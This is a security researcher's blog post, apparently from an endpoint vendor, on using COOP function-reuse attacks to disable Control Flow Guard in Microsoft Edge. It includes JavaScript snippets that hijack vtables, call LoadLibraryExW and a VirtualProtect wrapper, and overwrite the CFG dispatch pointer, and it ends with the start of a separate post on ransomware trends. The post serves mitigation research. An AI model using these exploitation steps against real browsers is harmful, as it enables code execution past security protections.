Disarming Control Flow Guard Using Advanced Code Reuse Attacks

April 25, 2017, 7:04 am

Advanced exploitation is moving away from ROP-based code-reuse attacks. Over the last two years, there has been a flurry of papers related to one novel code-reuse attack, Counterfeit Object-Oriented Programming (COOP). COOP represents a state-of-the-art attack targeting forward-edge control-flow integrity (CFI), and caught our attention in 2016 as we were integrating our CFI solution (HA-CFI) into our endpoint product. COOP largely remains in academia, and has yet to show up in exploit kits. This may be because attackers migrate towards the path of least resistance. In the case of Microsoft Edge on Windows 10 Anniversary Update, protected by Control Flow Guard (CFG), that path of least resistance is the absence of backward-edge CFI. But what happens when Return Flow Guard (RFG) emerges and the attacker can no longer rely on corrupting a return address on the stack?

We were curious to evaluate COOP against modern CFI implementations. This is not only a useful exercise to keep us on top of cutting-edge research in academia and the hacking community, but it also allows us to measure the effectiveness of our own mitigations, alter their design, or generally improve upon them when necessary. This first post of our two-part blog series covers our adventures evaluating COOP function-reuse attacks against Microsoft’s CFG and later our own HA-CFI.

Microsoft Control Flow Guard

There have been a number of papers, blogs, and conference talks already discussing Microsoft’s Control Flow Guard (CFG) at length. Trail of Bits does an excellent job of comparing Clang CFI and Microsoft CFG in two recent posts. The first post focuses on Clang, the second emphasizes Microsoft’s implementation of CFI, while additional research provides further detail on the implementation of CFG.

Bypassing CFG has also been a popular subject at security conferences over the past few years. Before we cite some notable bypasses, it is important to note that CFI can be further broken down into two types: forward-edge and backward-edge.

Forward-Edge CFI: Protects indirect CALL or JMP sites. Forward-edge CFI solutions include Microsoft CFG and Endgame’s HA-CFI.
Backward-Edge CFI: Protects RET instructions. Backward-edge CFI solutions would include Microsoft Return Flow Guard, components of Endgame’s DBI exploit prevention, as well as other ROP detections including Intel’s CET.

This categorization helps delineate what CFG is designed to protect – indirect call sites – and what it’s not meant to protect – the return stack. For instance, a recent POC ended up in exploit kits targeting Edge using a R/W primitive to modify a return address on the stack. This is not applicable to CFG, and should not be considered a weakness of CFG. If anything, it demonstrates CFG successfully pushing attackers to hijack control flow somewhere other than at indirect call sites. Examples that actually demonstrate flaws or limitations of CFG include: leveraging unprotected call sites, remapping read-only memory regions containing CFG code pointers and changing them to point to code that always passes a check, a race condition with the JIT encoder in Chakra, and using memory-based indirect calls. COOP or function-reuse attacks in general are an acknowledged limitation for some CFI implementations and noted as out-of-scope for Microsoft’s bypass bounty due to “limitations of coarse-grained CFI”. That said, we are not aware of any public POCs that use COOP specifically to attack CFG-hardened binaries.

CFG adds a __guard_fids_table to each protected DLL, composed of a list of RVAs of valid or sensitive targets for indirect call sites within the binary. An address is used as an index into a CFG bitmap, where bits can be toggled depending upon whether the address should be a valid destination. An API also exists to modify this bitmap, for example, to support JIT encoded pages: kernelbase!SetProcessValidCallTargets which invokes ntdll!SetInformationVirtualMemory before making the syscall to update the bitmap.

A new enhancement to CFG in Windows 10 Creators Update enables suppression of exports. In other words, exported functions can now be marked as invalid target addresses for CFG protected call sites. The implementation of this requires using a second bit for each address within the CFGBitmap, as well as a flags byte in the __guard_fids_table for each RVA entry when building the initial per process bitmap.

For 64-bit systems, bits 9-63 of the address are used as an index to retrieve a qword from the CFG bitmap, and bits 3-10 of the address are used (modulo 64) to access a specific bit within the qword. With export suppression, the CFG permissions for a given address are represented by two bits in the CFG bitmap. Additionally, __guard_dispatch_icall_fptr in most DLLs is now set to point to ntdll!LdrpDispatchUserCallTargetES where a valid call target must omit ‘01’ from the CFG bitmap.
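The index arithmetic described above can be sketched in a few lines of JavaScript. This is only a literal reading of the bit ranges quoted in the text, not a reimplementation of the ntdll routine; the `Map`-based bitmap, the function names, and the sample contents are assumptions made for illustration.

```javascript
// Sketch only: follows the bit ranges quoted in the text, not ntdll's actual code.
// The bitmap is modeled as a Map from qword index to a 64-bit BigInt.
function cfgBitmapPosition(address) {
  const qwordIndex = address >> 9n;         // bits 9-63 select the qword
  const bitOffset = (address >> 3n) % 64n;  // bits 3-10, modulo 64, select the bit
  return { qwordIndex, bitOffset };
}

function readCfgState(bitmap, address) {
  const { qwordIndex, bitOffset } = cfgBitmapPosition(address);
  const qword = bitmap.get(qwordIndex) ?? 0n; // missing entries read as all zero
  return (qword >> bitOffset) & 0b11n;        // two permission bits per entry
}

// Hypothetical bitmap contents: qword 8 has the entry at bit offset 2 set to '01'.
const bitmap = new Map([[8n, 0b0100n]]);
const state = readCfgState(bitmap, 0x1010n);
console.log(state.toString(2).padStart(2, "0"));
```

Note that two addresses 16 bytes apart land two bits apart in the same qword, which matches the two-bits-per-entry layout that export suppression requires.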

Implementing this new export suppression feature becomes a bit complicated when you factor in dynamically resolving symbols, since using GetProcAddress implies subsequent code may invoke the return value as a function pointer. Control Flow Guard handles this by changing the corresponding two-bit entry in the CFG bitmap from ‘10’ (export suppressed) to ‘01’ (valid call target), as long as the entry was not previously marked as sensitive or not marked valid at all (e.g. VirtualProtect, SetProcessValidCallTargets, etc.). As a result, some exports will begin as invalid indirect call targets on process creation, but eventually become valid call targets due to code executed at runtime. This is important to remember later in our discussion. For reference, a sample call stack when this occurs looks as follows:

00 nt!NtSetInformationVirtualMemory
01 nt!setjmpex
02 ntdll!NtSetInformationVirtualMemory
03 ntdll!RtlpGuardGrantSuppressedCallAccess
04 ntdll!RtlGuardGrantSuppressedCallAccess
05 ntdll!LdrGetProcedureAddressForCaller
06 KERNELBASE!GetProcAddress
07 USER32!InitializeImmEntryTable
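The suppressed-to-valid transition that GetProcAddress triggers can be modeled as a tiny state function. The sketch below covers only the two states named in the text; the constant and function names are hypothetical, and any other two-bit value is simply passed through unchanged.

```javascript
// Two-bit states as named in the text; other values are not interpreted here.
const EXPORT_SUPPRESSED = 0b10;
const VALID_TARGET = 0b01;

// Hypothetical model of what resolving an export does to its bitmap entry.
function grantSuppressedCallAccess(state) {
  // Only a suppressed export is promoted; every other entry keeps its state.
  return state === EXPORT_SUPPRESSED ? VALID_TARGET : state;
}

const afterResolve = grantSuppressedCallAccess(EXPORT_SUPPRESSED);
console.log(afterResolve === VALID_TARGET);
```

The one-way nature of this promotion is why the set of valid call targets only grows over the life of a process.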

COOP Essentials

Schuster et al. identified counterfeit object-oriented programming (COOP) as a potential weakness to CFI implementations. The attack sequences together and reuses existing virtual functions in order to execute code while passing all forward-edge CFI checks along the way. In a similar manner to ROP, the result is a sequence of small valid functions that individually perform minimal computation (e.g. load a value into RDX), but when pieced together perform some larger task. A fundamental component of COOP is to leverage a main loop function, which might iterate over a linked-list or array of objects, invoking a virtual method on each object. The attacker is then able to piece together “counterfeit” objects in memory, in some cases overlapping the objects, such that the main loop will call valid virtual functions of the attacker’s choosing in a controlled order. Schuster et al. demonstrated the approach with COOP payloads targeting Internet Explorer 10 on Windows 7 32-bit and 64-bit, and Firefox on Linux 64-bit. The research was later extended, demonstrating that recursion or functions with many indirect call invocations could also be used instead of a loop, and extended yet again into targeting the Objective-C runtime.
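To make the main-loop idea concrete, here is a toy simulation. Nothing in it touches real memory: the registers, the virtual functions, and the object layout are plain JavaScript stand-ins invented for this sketch, and the function names are hypothetical.

```javascript
// Toy model of a COOP main loop; registers and vfgadgets are JavaScript stand-ins.
const regs = { rdx: null, r8: null };
const log = [];

// Legitimate virtual functions that already exist in the (imaginary) target.
const vfuncs = {
  loadR8(self) { regs.r8 = self.fieldA; },    // argument populator
  loadRdx(self) { regs.rdx = self.fieldB; },  // argument populator
  invoke(self) { log.push(self.fn(self.arg, regs.rdx, regs.r8)); }, // invoker
};

// Looper: walks a linked list and calls one virtual method per object.
function looper(head) {
  for (let obj = head; obj !== null; obj = obj.next) {
    obj.vtable.method(obj);
  }
}

// Counterfeit objects: attacker-chosen vtables and fields, linked in the desired order.
const third = {
  vtable: { method: vfuncs.invoke },
  fn: (a, b, c) => `api(${a}, ${b}, ${c})`,
  arg: "lib.dll",
  next: null,
};
const second = { vtable: { method: vfuncs.loadRdx }, fieldB: 0, next: third };
const first = { vtable: { method: vfuncs.loadR8 }, fieldA: 0x800, next: second };

looper(first);
console.log(log[0]);
```

Every call the looper makes targets a function that a forward-edge check would accept; only the order and the data are attacker-controlled.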

This prior research is extremely interesting and novel. We wanted to apply the concept to some modern CFI implementations to assess: a) the difficulty of crafting a COOP payload in a hardened browser; b) whether we could bypass CFG and HA-CFI; and c) whether we could improve our CFI to detect COOP style attacks.

Our Target

Our primary target for COOP was Microsoft Edge on Windows 10, as it represents a fully hardened CFG application, and allows us to prepare our COOP payload in memory using JavaScript. While vulnerabilities are always of interest to our team, for this effort we focus on the hijack of control flow with CFI in place, and make the following assumptions as an attacker:

An arbitrary read-write primitive is obtained from JavaScript.
Hardcoded offsets are allowed, as dynamically finding gadgets at run-time is out of scope for this particular effort.
All of Microsoft’s latest mitigations in Creators update are enabled (e.g. ACG, CIG, CFG with export suppression).
The attacker must not bypass or avoid CFG in any way other than using COOP.

For our initial research, we leveraged a POC from Theori for Microsoft Edge on Windows 10 Anniversary update (OS build 14393.953). However, we designed our payload with Creators update mitigations in mind, and validated our final working COOP payload on Windows 10 Creators update (OS build 15063.138) with export suppression enabled.

An ideal POC would execute some attacker shellcode or launch an application. A classic code execution model for an attacker is to map some controlled data in memory as +X, and then jump to shellcode in that newly modified +X region. However, our real goal is to generate COOP payloads that execute something meaningful while protected by forward-edge CFI. Such a payload provides data points with which we can test and refine our own CFI algorithms. Further, attacking Arbitrary Code Guard (ACG) or the child process policy in Edge is slightly out of scope. We decided an acceptable end goal for our research on Windows 10 Creators Update was to use COOP to effectively disable CFG, opening up the ability to then jump or call any arbitrary location within a DLL. We thus ended up with two primary COOP payloads:

For Windows 10 Anniversary Update, and a lack of ACG, our payload maps data we control as executable, and then jumps into that region of controlled shellcode after disabling CFG.
For Windows 10 Creators Update, our end goal was to simply disarm CFG.

Finding COOP Gadgets

Following the blueprint left by Schuster et al., our first order of business was to agree upon a terminology for the various components of COOP. The academic papers refer to each reused function as a virtual function gadget or vfgadget, and when describing each specific type of vfgadget an abbreviation is used such as ML-G for a main loop vfgadget. We opted to name each type of gadget in a more informal way. Terms you find in the remaining post are defined here:

Looper: the main loop gadget critical to executing complex COOP payloads (ML-G in paper)
Invoker: a vfgadget which invokes a function pointer (INV-G in paper)
Arg Populator: a virtual function which preps an argument, either loading a value into a register (LOAD-R64-G in paper), or moving the stack pointer and/or loading values on the stack (MOVE-SP-G in paper)

Similar to the paper, we wrote scripts to help us identify vfgadgets in a given binary. We used IDAPython, with logic to find loopers, invokers, and argument populators. In our research, we found that a practical approach to COOP is to chain together and execute a small number of vfgadgets at a time, before returning to JavaScript, repeating the process through additional COOP payloads as needed. For this reason, we did not find it necessary to lift binary code to IR for our purposes. However, piecing together an extremely large COOP payload, such as running a C2 socket thread entirely via reused code, may require lifting to IR in order to assemble the desired logic. For each subtype of vfgadget, we defined a list of rules that we used while conducting a search within two of the more fruitful binaries in Edge (chakra.dll and edgehtml.dll). A few of these rules for a looper vfgadget include:

Function present on __guard_fids_table
Contain a loop with exactly 1 indirect call taking 0 arguments
Loop must not clobber argument registers
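The looper rules above can be expressed as a simple filter. The sketch below is not our IDAPython tooling; it assumes a hypothetical earlier analysis pass has already produced one record per function, and the record fields and function names are made up for illustration.

```javascript
// Hypothetical record shape; a real pass would fill these fields from disassembly.
const candidates = [
  { name: "A::Walk", inGuardFidsTable: true,
    loops: [{ indirectCalls: [{ argCount: 0 }], clobbersArgRegisters: false }] },
  { name: "B::Notify", inGuardFidsTable: true,
    loops: [{ indirectCalls: [{ argCount: 2 }], clobbersArgRegisters: false }] },
  { name: "C::Flush", inGuardFidsTable: false,
    loops: [{ indirectCalls: [{ argCount: 0 }], clobbersArgRegisters: false }] },
];

// Applies the three looper rules listed in the text to one function record.
function isLooperCandidate(fn) {
  if (!fn.inGuardFidsTable) return false;           // must be a valid CFG target
  return fn.loops.some((loop) =>
    loop.indirectCalls.length === 1 &&              // exactly one indirect call
    loop.indirectCalls[0].argCount === 0 &&         // that takes no arguments
    !loop.clobbersArgRegisters                      // and leaves argument registers alone
  );
}

const loopers = candidates.filter(isLooperCandidate).map((fn) => fn.name);
console.log(loopers);
```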

Of all the classes of vfgadgets, the search for loopers was the most time consuming. Many potential loopers have restrictions that make them hard to work with. Our hunt for invokers turned up not only vfgadgets for invoking function pointers, but also many vfgadgets that can very quickly and easily populate up to six arguments at once, all from a single counterfeit object. For this reason, there are shortcuts available for COOP when attempting to invoke a single API, which completely avoid requiring a loop or recursion, unless a return value is needed. Numerous register populators were found for all argument registers on x64. It is worth mentioning that a number of the original vfgadgets proposed in the Schuster et al. COOP paper from mshtml can still be found in edgehtml. However, we added a requirement to our effort to avoid reusing any of these and instead find all new vfgadgets for our COOP payloads.

COOP Payloads

By triggering COOP from a scripting language, we can actually move some complex tasking out of COOP, since chaining together everything at once can get complicated. We can use JavaScript to our advantage and repeatedly invoke miniature COOP payload sequences. This allows us to move things like arithmetic and conditional operations back to JavaScript, and leave the bare essential function reuse to prepping and invoking critical APIs via COOP. We show an example of this methodology, including passing return values from COOP back to JavaScript, in our Hijack #1 section discussing how to invoke LoadLibrary.

For brevity, I will only step through one of our simplest payloads. A common theme to all of our payloads is the requirement to invoke VirtualProtect. Since VirtualProtect and the eshims APIs are marked as sensitive and not a valid target for CFG, we have to use a wrapper function in Creators Update. As originally suggested by Thomas Garnier, a number of convenient wrappers can be found in .NET libraries mscoree.dll and mscories.dll such as UtilExecutionEngine::ClrVirtualProtect. Because Microsoft’s ACG prevents creating new executable memory, or changing existing executable memory to become writable, an alternate approach is required. Read-only memory can be remapped as writable with VirtualProtect, so I borrow the technique from a BlackHat 2015 presentation, and remap the page containing chakra!__guard_dispatch_icall_fptr as writable, then overwrite the function pointer to point to an arbitrary place in chakra.dll that contains a jmp rax instruction. In fact, there already exists a function in most DLLs, __guard_dispatch_icall_nop, which is exactly that – a single jmp rax instruction. As a result, I can effectively disable CFG since all protected call sites within chakra.dll will immediately just jump to the target address as if it passed all checks. Presumably one could take this a step further to explore function-reuse to attack ACG. To accomplish this mini-chain, the following is required:

Load mscoree.dll into the Edge process
Invoke ClrVirtualProtect +W on a read-only memory region of chakra.dll
Overwrite __guard_dispatch_icall_fptr to always pass check

As seen from the list of vfgadgets above, edgehtml is an important library for COOP. Thus, the first order of business is to leak the base address for edgehtml as well as any other necessary components, such as our counterfeit memory region. This way the payload can contain hardcoded offsets to be rebased at runtime. Using the info leak bug in Theori’s POC, we can obtain all the base addresses we need.

// OS Build 10.0.14393
var chakraBase = Read64(vtable).sub(0x274C40);
var guard_disp_icall_nop = chakraBase.add(0x273510);
var chakraCFG = chakraBase.add(0x5E2B78); //_guard_dispatch_icall...
var ntdllBase = Read64(chakraCFG).sub(0x95260);

// Find global CDocument object, VTable, and calculate EdgeHtmlBase
var [hi, lo] = PutDataAndGetAddr(document);
var CDocPtr = Read64(new Long(lo + 0x30, hi, true));
var EdgeHtmlBase = Read64(CDocPtr).sub(0xE80740);

// Rebase our COOP payload
rebaseOffsets(EdgeHtmlBase, chakraBase, ntdllBase, pRebasedCOOP);
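The post does not show the body of rebaseOffsets, so the following is only a guess at the general idea rather than the code we used. It uses BigInt instead of the Long helper from the POC, and the slot format, the function name `rebasePayload`, and the base addresses are all hypothetical.

```javascript
// Each payload slot is either a literal value or a module-relative offset.
function rebasePayload(slots, bases) {
  return slots.map((slot) => {
    if (slot.module === undefined) return slot.value;  // literal, left untouched
    const base = bases[slot.module];
    if (base === undefined) throw new Error(`no leaked base for ${slot.module}`);
    return base + slot.offset;                         // hardcoded offset + leaked base
  });
}

// Made-up base addresses standing in for values leaked at runtime.
const bases = { edgehtml: 0x7ff810000000n, chakra: 0x7ff820000000n };
const slots = [
  { module: "edgehtml", offset: 0x2dc540n },
  { value: 0x800n },
  { module: "chakra", offset: 0x273510n },
];

const rebased = rebasePayload(slots, bases);
console.log(rebased.map((v) => "0x" + v.toString(16)));
```

Keeping literals and module-relative offsets distinct in the payload description means the same payload can be rebased again after each new leak.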

Triggering COOP

A key part of using COOP is the initial transition from JavaScript into a looper function. Using our assumed R/W primitive, we can easily hijack a vtable in chakra to point to our looper, but how do we ensure the looper then begins iterating over our counterfeit data? For that answer we need to evaluate the looper, which I chose as CTravelLog::UpdateScreenshotStream:

Notice in the first block before the loop, the code is retrieving a pointer to a linked list at this + 0x30h. In order to properly kick off the looper, we must both hijack a JavaScript object’s vtable to include the address of our looper, and then place a pointer at object + 0x30 that points to the start of our counterfeit object list. The actual counterfeit object data can be defined and rebased entirely in JavaScript. Also notice the loop is iterating over a list with a next pointer at object + 0x80h. This is important when crafting our counterfeit object stream. Additionally, notice the vtable offset for this indirect call site is +0xF8h. Every fake vtable pointer in our counterfeit objects must therefore hold the address of the desired function pointer minus 0xF8h, which often will be in the middle of some neighboring vtable. To kick off our COOP payload, I chose to hijack a JavascriptNativeIntArray object and will specifically override the freeze() and seal() virtual functions as follows.

var hijackedObj = new Array(0);
[hi, lo] = PutDataAndGetAddr(hijackedObj);
var objAddr = new Long(lo, hi, true);
Write64(objAddr.add(0x30), pRebasedCOOP);
Write64(objAddr, pFakeVTable);
Object.seal(hijackedObj); //Trigger initial looper
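The two layout constraints imposed by this looper (the call through vtable + 0xF8h and the next pointer at + 0x80h) can be captured in a small helper. This is a sketch that writes into a local ArrayBuffer rather than process memory; the helper names and the sample addresses are hypothetical.

```javascript
const CALL_SLOT = 0xf8n;   // vtable offset used by the looper's indirect call
const NEXT_OFFSET = 0x80;  // offset of the next pointer the looper follows

// Value to store at object+0 so that [vtable + 0xF8] is the slot holding the vfgadget.
function fakeVtablePointer(slotAddress) {
  return slotAddress - CALL_SLOT;
}

// Lays out one counterfeit object (little-endian) at the given buffer offset.
function writeCounterfeitObject(view, offset, slotAddress, nextAddress) {
  view.setBigUint64(offset, fakeVtablePointer(slotAddress), true);
  view.setBigUint64(offset + NEXT_OFFSET, nextAddress, true);
}

// Made-up addresses: a vtable slot that holds the vfgadget, and the next object.
const view = new DataView(new ArrayBuffer(0x200));
writeCounterfeitObject(view, 0, 0x7ff800001238n, 0x20000090n);
console.log("0x" + view.getBigUint64(0, true).toString(16));
```

A next pointer of zero would terminate the list, assuming the looper stops on a null pointer.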

Hijack #1: Invoking LoadLibrary

As previously stated, my end goal was bypassing CFG on Edge on Win10 Creators update with export suppression enabled. Looking at the various LoadLibrary calls exported in kernel32 and kernelbase, it turns out loading a new DLL into our process is rather easy even with the latest CFG feature in place. The reason for this is two-fold. First, LoadLibraryExW is actually marked as a valid call target in the __guard_fids_table within kernel32.dll.

Second, the rest of the LoadLibrary calls within both kernel32 and kernelbase start out as suppressed, but in Edge they eventually become valid call targets. This appears to stem from some delayed loading in MicrosoftEdgeCP!_delayLoadHelper2, which eventually results in GetProcAddress being called on the LoadLibraryX APIs. As foreshadowed earlier, this demonstrates the difficulty of making all function exports invalid call targets. Even if these other LoadLibrary call gates remained suppressed or were only opened temporarily, for our purposes we can just use kernel32!LoadLibraryExW since it’s initialized as a valid target.

To get our desired VirtualProtect wrapper loaded into the Edge process, we need to invoke LoadLibraryExW(“mscoree.dll”, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32). We could cut corners here, and leverage one of the aforementioned invokers to populate all of our parameters at once, but instead let’s create a traditional COOP payload using a looper vfgadget to iterate over four counterfeit objects.

Our first iteration will populate r8d with 0x800. CHTMLEditor::IgnoreGlyphs is a nice vfgadget to populate r8d as seen in the assembly below. Our parameter 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32) will be loaded from this + 0xD8h. Recall that the next pointer in our counterfeit objects must be at +0x80h. We could create four contiguous counterfeit objects in memory to each be of size greater than 0xD8h, or we could treat the next pointer to be located at the end of our object. I chose the latter. In this case, we will have an overlapping object so we must be careful that the offset of this + 0xD8 does not interfere with the vfgadget from our second iteration that operates on the second object in memory. The first counterfeit object for populating r8d looks as follows:
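The overlap arithmetic is easy to get wrong, so a small checker helps. The sketch below assumes objects are packed back to back with the next pointer as their last 8 bytes, which gives a stride of 0x88; that stride is an assumption for illustration, and the real payload layout may differ.

```javascript
// Where does a field of object `index` land when objects are `stride` bytes apart?
function locateField(index, fieldOffset, stride) {
  const absolute = index * stride + fieldOffset;
  return {
    object: Math.floor(absolute / stride), // which object's storage is touched
    offset: absolute % stride,             // offset inside that object
    absolute,                              // offset from the start of the region
  };
}

// Assumed stride: next pointer at +0x80 occupies the final 8 bytes of each object.
const STRIDE = 0x88;
const hit = locateField(0, 0xd8, STRIDE);
console.log(`object ${hit.object}, offset 0x${hit.offset.toString(16)}`);
```

Under this assumption, the value the first vfgadget reads from this + 0xD8h sits inside the second object, so the second vfgadget must not depend on that same offset.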

Upon return from this vfgadget, the looper then iterates over our fake linked list and must now invoke another vfgadget this time to populate rdx with a value of 0x0 (NULL). To achieve this I use Tree::ComputedRunTypeEnumLayout::BidiRunBox::RunType(). We can load our value (0x0) from our counterfeit object + 0x28h.

Now that we have populated parameters 2 and 3 for our API call, we need to populate the first argument, a pointer to our ‘mscoree.dll’ string, and then invoke a function pointer to LoadLibraryExW. A perfect invoker vfgadget exists for this purpose, Microsoft::WRL::Details::InvokeHelper::Invoke(). The assembly and corresponding third counterfeit object are as follows:

Now that LoadLibraryExW has been called, and hopefully mscoree.dll loaded into our process, we need to get the return value back to JavaScript to rebase additional COOP payloads. Both the looper and CFG make use of RAX for the indirect branch target, so we need to find another way to get the virtual address for the newly loaded module back to JavaScript. Fortunately, upon exiting LoadLibraryExW, RDX also contains a copy of the module address. Therefore, we can tack on one final vfgadget to our object list in order to move RDX back into our counterfeit object memory region. For the final iteration of our loop, we will invoke CBindingURLBlockFilter::SetFilterNotify(), which will copy RDX into the address of our current counterfeit object minus 0x88h.

The looper then reaches the end of our list, and returns from the hijacked seal() call transferring control back to our JavaScript code. The first COOP payload has completed, mscoree.dll has been loaded into Edge, and we can now retrieve the base address for mscoree from JavaScript in the code snippet below.

//Retrieve loadlibrary return val from coop region
var mscoreebase = Read64(pRebasedCOOP.add(0x128));
alert("mscoree.dll loaded at: 0x" + mscoreebase.toString(16));

Hijack #2: Invoking VirtualProtect Wrapper

Having successfully completed our first COOP payload, we can now rebase a second COOP payload to invoke ClrVirtualProtect on the read-only memory region that contains chakra!__guard_dispatch_icall_fptr in order to make it writable. Our objective is to call ClrVirtualProtect(this, chakraPageAddress, 0x1000, PAGE_READWRITE, pScratchMemory). This time we will demonstrate a COOP payload that does not make use of a loop or recursion by using a single counterfeit object to populate all arguments and invoke a function pointer. We’ll use the same invoker vfgadget as before, only this time it is primarily used to move a counterfeit object into rcx.
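The argument values for that call can be derived with a little arithmetic. In this sketch, PAGE_READWRITE is the documented Windows protection constant 0x04, the addresses are made up, and the helper names are hypothetical; the `this` argument is omitted because it comes from the counterfeit object.

```javascript
const PAGE_SIZE = 0x1000n;
const PAGE_READWRITE = 0x04n; // Windows memory protection constant

// Rounds an address down to the start of its 4 KB page.
function pageBase(address) {
  return address & ~(PAGE_SIZE - 1n);
}

// Arguments after `this`: page address, size, new protection, old-protection out pointer.
function virtualProtectArgs(targetAddress, scratchAddress) {
  return [pageBase(targetAddress), PAGE_SIZE, PAGE_READWRITE, scratchAddress];
}

// Made-up chakra base plus the CFG pointer offset used earlier in the post.
const cfgPointer = 0x7ff800000000n + 0x5e2b78n;
const args = virtualProtectArgs(cfgPointer, 0x20000400n);
console.log(args.map((v) => "0x" + v.toString(16)));
```

The scratch address only needs to be writable memory we control, since the API stores the previous protection value there.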

We hijack the freeze() virtual method from our original JavascriptNativeIntArray to point to Microsoft::WRL::Details::InvokeHelper::Invoke. This vfgadget will move the this pointer based on the address at this + 0x10, and it will treat this+0x18h as a function pointer. Thus, from our R/W primitive in JavaScript, in addition to hijacking the vtable to call this invoker trampoline function, we also need to overwrite the values of the object + 0x10 and + 0x18.

Write64(objAddr.add(0x10), pCOOPMem2);
Write64(objAddr.add(0x18), EdgeHtmlBase.add(0x2DC540));
Object.freeze(hijackedObj); // trigger the hijacked freeze() on the object itself, not on its address

Notice that our fake object will load all the required parameters for ClrVirtualProtect, as well as populate the address of ClrVirtualProtect into rax by resolving index +0x100h from another fake vtable. Upon completion, this will map the desired page in chakra.dll to be writable.

At this point we are done with COOP, and our last step is to actually disarm CFG for chakra.dll. We can pick any arbitrary address in chakra.dll that contains the instruction jmp rax. Once this is identified, we use our write primitive from JavaScript to overwrite the function pointer for chakra!__guard_dispatch_icall_fptr to point to this address. This has the effect of NOPing the CFG validation routine, and allows us to hijack a chakra vtable from JavaScript to jump anywhere.

//Change chakra CFG pointer to NOP check
Write64(chakraCFG, guard_disp_icall_nop);

//trigger hijack to 0x4141414141414141
Object.isFrozen(hijackedObj);

As the WinDbg output below illustrates, with CFG now disabled our hijack was successful and the process crashes when trying to jump to the unmapped address 0x4141414141414141. It’s important to point out that we could have made this hijack jump to anywhere in the process address space due to CFG being disabled. By comparison, with CFG in place an exception would have been thrown since 0x4141414141414141 is not valid in the bitmap, and we would have seen the original CFG routine that we swapped out, ntdll!LdrpDispatchUserCallTargetES, in our call stack.
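The effect of that single pointer overwrite can be illustrated with a toy model. Function names stand in for addresses here, the `guard` object stands in for the writable __guard_dispatch_icall_fptr slot, and none of this reflects how ntdll actually implements the check.

```javascript
// Toy model: names stand in for addresses, a Set stands in for the CFG bitmap.
const validTargets = new Set(["legitVirtualFunction"]);
const functions = {
  legitVirtualFunction: () => "ok",
  arbitraryCode: () => "hijacked",
};

// Stand-in for the real validation routine: reject targets not in the bitmap.
function checkedDispatch(name) {
  if (!validTargets.has(name)) throw new Error(`CFG violation: ${name}`);
  return functions[name]();
}

// Stand-in for __guard_dispatch_icall_nop: jump to the target without checking.
function nopDispatch(name) {
  return functions[name]();
}

// Stand-in for the per-module dispatch pointer that every protected call site uses.
const guard = { dispatchIcall: checkedDispatch };
function protectedCallSite(name) {
  return guard.dispatchIcall(name);
}

let before;
try {
  protectedCallSite("arbitraryCode");
  before = "allowed";
} catch (e) {
  before = "blocked";
}

guard.dispatchIcall = nopDispatch; // the single pointer overwrite
const after = protectedCallSite("arbitraryCode");
console.log(before, after);
```

Because every protected call site in the module goes through the same pointer, one write removes the check for all of them.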

Conclusion

In this post, I discussed COOP, a novel code-reuse attack proposed in academia, and demonstrated how it can be used to attack modern Control-Flow Integrity implementations, such as Microsoft CFG. Overall, COOP is fairly easy to work with, particularly when breaking up payloads into smaller chains. Piecing together vfgadgets is not unlike the exercise of assembling ROP gadgets. Perhaps the most time consuming portion is finding and labeling candidate vfgadgets of various types within your target process space.

Microsoft’s Control Flow Guard is considered a coarse-grained CFI implementation and is thus more vulnerable to function reuse attacks such as described here. By comparison, fine-grained CFI solutions are able to validate call sites beyond just the target address considering elements such as expected VTable type, validating number of arguments, or even argument types, for a given indirect call. A key tradeoff between the two approaches is performance, as introducing too much complexity into a CFI policy can add significant overhead. Nonetheless, mitigating advanced code-reuse attacks is important moving forward as applications become hardened with some form of forward-edge and backward-edge CFI.
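The difference between the two policies can be shown with a toy comparison. This sketch does not describe CFG, HA-CFI, or any other real implementation; the target table, the call-site descriptor, and all names in it are invented for illustration.

```javascript
// Invented metadata: which class each valid target belongs to and how many args it takes.
const targets = new Map([
  ["Foo::render", { className: "Foo", argCount: 0 }],
  ["Bar::setFilter", { className: "Bar", argCount: 1 }],
]);

// Coarse-grained: any known function entry point is acceptable at any call site.
function coarseCheck(target) {
  return targets.has(target);
}

// Fine-grained: the target must also match what this particular call site expects.
function fineCheck(target, site) {
  const info = targets.get(target);
  return info !== undefined &&
    info.className === site.expectedClass &&
    info.argCount === site.argCount;
}

// A call site that expects a zero-argument method on Foo.
const site = { expectedClass: "Foo", argCount: 0 };
console.log(coarseCheck("Bar::setFilter"), fineCheck("Bar::setFilter", site));
```

A reused virtual function from an unrelated class passes the coarse check but fails the fine one, which is the gap that COOP exploits. The extra lookups per call are where the performance cost comes from.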

To offset some of the limitations of CFG, Microsoft appears to be focused on diversifying its preventions such as protecting critical call gates like VirtualProtect with export suppression in CFG and Arbitrary Code Guard. However, one important takeaway from this post should be the challenges of designing and enforcing mitigations from user-space. As we saw with EMET a couple of years ago, researchers were able to disarm EMET by reusing code inserted by EMET itself. Further, as was originally demonstrated at BlackHat 2015, here we are similarly taking advantage of critical CFG function pointers residing in user-space to alter the behavior of CFG.

By comparison, Endgame’s HA-CFI solution is implemented and enforced entirely from the kernel and uses hardware features. Even if it is vulnerable to function-reuse attacks, the privilege separation makes it more difficult to tamper with. In the second part of this series, I will discuss our COOP adventures with our own HA-CFI and ongoing research, and how our detection logic evolves to account for advanced function-reuse attacks.

No Experience Required: Ransomware in 2017 and Beyond

May 1, 2017, 7:19 am

Much to the chagrin of the computer security industry, business executives, and people around the world, ransomware had a banner year in 2016. Hospitals, mass transit systems, hotels, and government offices have all fallen victim to widespread ransomware infections that significantly degraded their capabilities and held their data hostage for significant periods of time. In response, the security community continues to commit significant resources to fight this family of threats, and is beginning to produce some promising results. However, despite these investments and advances, ransomware continues to proliferate and evolve at an accelerating rate, bringing in an estimated $1,000,000,000 in 2016.

While it is difficult to fully predict the evolution of ransomware, a review of recent trends in ransomware, malware, and the computer industry as a whole provides useful insights into what the future may hold, and allows us to better prepare for upcoming advances.

What's New in Ransomware?

As we wrote last year when revealing the existence of a new version of TeslaCrypt, ransomware has expanded to a much broader audience than in previous years. Widespread spam campaigns and drive-by downloads facilitated by exploit kits helped attackers initiate an estimated 638 million ransomware attacks in 2016, a significant increase from an estimated 3.8 million attacks in 2015.

Timeline of the Growth of Ransomware

Operating System Targets

Though Mac and Linux-based ransomware has been spotted in the wild, a vast majority of ransomware is Windows-based, as it is still the dominant operating system for personal computer end users. Ransomware attackers will continue to primarily target Windows until other operating systems catch up in market share, as the case has always been for malware in general. Mobile ransomware is a potential growing threat, but Apple and Google have largely kept it in check by keeping their operating systems regularly updated and reviewing submissions to their respective application stores.

